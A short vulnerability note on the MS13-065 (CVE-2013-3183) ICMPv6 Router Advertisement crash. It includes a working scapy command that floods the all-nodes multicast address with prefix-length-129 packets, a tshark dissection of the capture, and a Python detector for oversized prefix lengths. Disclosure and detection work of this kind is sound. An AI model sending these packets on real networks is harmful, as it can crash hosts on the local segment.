MS13-065 - CVE-2013-3183
System crash if an attacker sends a maliciously crafted ICMPv6 Router Advertisement packet that contains an invalid prefix length field.


$ sudo scapy
>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129), loop=1, inter=0.5)
....^C
Sent 4 packets.

$ tshark -r capture-scapy-CVE-2013-3183.pcap -V
Internet Control Message Protocol v6
    Type: Router Advertisement (134)
    Code: 0
    Checksum: 0x127e [correct]
    Cur hop limit: 0
    Flags: 0x08
        0... .... = Managed address configuration: Not set
        .0.. .... = Other configuration: Not set
        ..0. .... = Home Agent: Not set
        ...0 1... = Prf (Default Router Preference): High (1)
        .... .0.. = Proxy: Not set
        .... ..0. = Reserved: 0
    Router lifetime (s): 1800
    Reachable time (ms): 0
    Retrans timer (ms): 0
    ICMPv6 Option (Prefix information : 2001:db8:bad:cafe::/129)
        Type: Prefix information (3)
        Length: 4 (32 bytes)
        Prefix Length: 129
        Flag: 0xc0
            1... .... = On-link flag(L): Set
            .1.. .... = Autonomous address-configuration flag(A): Set
            ..0. .... = Router address flag(R): Not set
            ...0 0000 = Reserved: 0
        Valid Lifetime: 4294967295 (Infinity)
        Preferred Lifetime: 4294967295 (Infinity)
        Reserved
        Prefix: 2001:db8:bad:cafe:: (2001:db8:bad:cafe::)
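
A detection-side check for the malformed option shown in the dissection above, as an added example that is not part of the original note: it walks the options of a raw ICMPv6 Router Advertisement and reports any Prefix Information option whose prefix length exceeds 128 bits. The function names and the sample packet builder are assumptions made for this example; the sample bytes are constructed to mirror the tshark output.

```python
import ipaddress
import struct

RA_TYPE = 134          # ICMPv6 Router Advertisement
OPT_PREFIX_INFO = 3    # Prefix Information option (RFC 4861, section 4.6.2)
RA_HEADER_LEN = 16     # type, code, checksum, hop limit, flags, 3 timers


def invalid_prefix_options(icmpv6: bytes) -> list:
    """Return (prefix, prefix_len) for each Prefix Information option in an
    ICMPv6 Router Advertisement whose prefix length exceeds 128 bits."""
    if len(icmpv6) < RA_HEADER_LEN or icmpv6[0] != RA_TYPE:
        return []
    findings = []
    offset = RA_HEADER_LEN
    while offset + 2 <= len(icmpv6):
        opt_type, opt_units = icmpv6[offset], icmpv6[offset + 1]
        opt_len = opt_units * 8           # option length is in 8-byte units
        if opt_len == 0 or offset + opt_len > len(icmpv6):
            break                         # zero-length or truncated option: stop
        if opt_type == OPT_PREFIX_INFO and opt_len == 32:
            prefix_len = icmpv6[offset + 2]
            prefix = ipaddress.IPv6Address(icmpv6[offset + 16:offset + 32])
            if prefix_len > 128:          # an IPv6 prefix cannot exceed 128 bits
                findings.append((str(prefix), prefix_len))
        offset += opt_len
    return findings


def build_sample_ra(prefix_len: int) -> bytes:
    """Constructed sample mirroring the tshark dissection above
    (checksum left as zero; it is not needed for this check)."""
    header = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 0, 0x08, 1800, 0, 0)
    option = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefix_len, 0xC0,
                         0xFFFFFFFF, 0xFFFFFFFF, 0)
    option += ipaddress.IPv6Address("2001:db8:bad:cafe::").packed
    return header + option


if __name__ == "__main__":
    print(invalid_prefix_options(build_sample_ra(129)))   # flagged
    print(invalid_prefix_options(build_sample_ra(64)))    # clean
```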